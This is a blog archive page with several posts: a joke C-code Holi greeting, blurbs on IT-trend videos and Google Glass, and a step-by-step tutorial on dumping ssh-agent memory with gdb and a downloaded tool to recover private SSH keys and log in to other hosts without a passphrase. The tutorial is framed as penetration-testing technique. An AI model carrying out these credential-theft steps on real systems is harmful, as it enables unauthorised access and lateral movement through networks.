Showing posts with label technology. Show all posts
Showing posts with label technology. Show all posts

Thursday, March 5, 2015

How to wish "Happy Holi" as a Computer Wizard

!!!!   HAPPY HOLI   !!!!


# include <wishes.h>
#include<blessings.h­>
#include<happiness.h­>
void main()
{
int kaju, chocolates, laddu, rang, gubara
bomb;
clrscr();
if(date==05 march)
printf("Happy choti holi");
else if(date==06 march)
printf("Happy Holi");
getch(smiles and Love );
}
Holi dhamaka
Sending love, happiness, joy, with the Holi wishes.
Ye hum engineers ka tarika hai Holi wish karne ka...
 
 

Monday, January 5, 2015

Easy way for Stealing unencrypted SSH-agent keys from memory


Stealing unencrypted SSH-agent keys from memory


Hi folks,  Today post I will show how to grab ssh key from memory  to login without password.
If you’ve ever used SSH keys to manage multiple machines, then chances are you’ve used SSH-agent. SSHKEY-grab-master  tool is designed to keep a SSH key in memory so that the user doesn’t have to type their passphrase in every time. However, this can create some security risk. A user running as root may have the ability to pull the decrypted SSH key from memory and reconstruct it.

Due to needing root access, this attack may seem useless. For example, an attacker may be able to install a keylogger and use that to obtain the passphrase for the SSH key. However, this causes the attacker to have to wait for the target to type in their passphrase. This might be hours, days, or weeks, depending on how often the target logs out. This is why obtaining the SSH key from memory is vital to pivoting to other machines in a speedy fashion.


Using SSH-agent

A common method of using SSH-agent is running “SSH-agent bash” and then “SSH-add” to add the key to the agent. Once added, the key will stay in the SSH-agent’s stack until the process ends, another key is added, or the user uses the -d or -D option with SSH-add. Most people will run this once and then forget about it until they need to reboot.

Screenshot - Wednesday 20 August 2014 - 06:45:23  IST

Screenshot - Wednesday 20 August 2014 - 06:09:44  IST


Pulling a SSH Key From Memory

There are a few ways to create a copy of the SSH-agents memory. The easiest way is through the use of gdb. Gdb uses the ptrace call to attach to the SSH-agent. This provides gdb with the privileges necessary to create a memory dump of the running process. The grabagentmem.sh script provides a way of automating the dumping of this memory. By default, when it runs it will create a memory dump of the stack for each SSH-agent process. These files are named SSHagent-PID.stack.


#cd /tmp
#wget  -c  https://github.com/NetSPI/sshkey-grab/archive/master.zip
#unzip -q master.zip
#cp sshkey-grab-master/* .
#chmod +x  grabagentmem.sh
#chmod +x parse_mem.py
#../grabagentmem.sh

If gdb is not available on the system, then it might be feasible to take a memory dump of the entire machine and use volatility to extract the stack of the SSH-agent processes. However, this process is currently out of the scope for this document.

Parsing SSH Keys From the Memory Dump

Once we have a copy of the stack it becomes possible to extract the key from this file. However, the key is kept in the stack in a different format then the one that was generated by SSH-keygen. This is where the parse_mem.py script comes in handy. This script requires the installation of the pyasn1 python module. Once that is installed the script can be run against the memory file. If that memory file contains a valid RSA SSH key then it will save it to disk. Future versions of the tool may support additional key formats, such as DSA, ECDSA, ED25519, and RSA1.

#./parse_mem.py  /tmp/SSHagent-17019.stack  /tmp/key

sam

This key.rsa file can then be used as an argument to the -i switch in SSH. This will act like the original user’s key, only without requiring a pass phrase to unlock it.

#ssh  -i  key.rsa   remotehost

Screenshot - Wednesday 20 August 2014 - 06:30:20  IST

Obtaining valid, usable SSH keys can help a penetration tester gain further access into a client’s network. It’s common for keys to be used on both the user’s account, as well as the root account on servers. It is also possible that a server is configured to only allow key access. Having access to an unencrypted key can make moving around the environment much easier.

Sunday, January 4, 2015

NuggetCast: Wearable Tech Attack

NuggetCast: Wearable Tech Attack 







Saturday, January 3, 2015

Google Glass : Latest Technology


An introduction to the basics of Google Glass.

Learn about the touchpad, the timeline and how to share through Glass.

Interested in finding out more about Glass?
Visit: http://google.com/glass
Google+: http://google.com/+GoogleGlass
Twitter: http://twitter.com/googleglass
Instagram: http://instagr.am/googleglass
Facebook: http://facebook.com/GoogleGlass

Google is Watching you!!

A brief demonstration of how Google Stores information about you.

Friday, January 2, 2015

NuggetCast: Top IT Trends of 2014 :D

Happy Holidays from CBT Nuggets! One of the fun things about working with IT technology is how quickly it changes, or learning about all the new things coming our way in the future. This month, we’ll take a look back at 2014 to explore the Top IT trends, as presented by 3 CBT Nuggets trainers: Anthony Sequoia, Chris Ward and Garth Schulte. We’ll explore Unified Fabric, the merging of Lync and Skype, and IT home automation and why it matters to IT pros. Add in a dose of demented holiday cheer and you’ll have our perfect wrap up to the year 2014 in the IT industry.

Blog Archive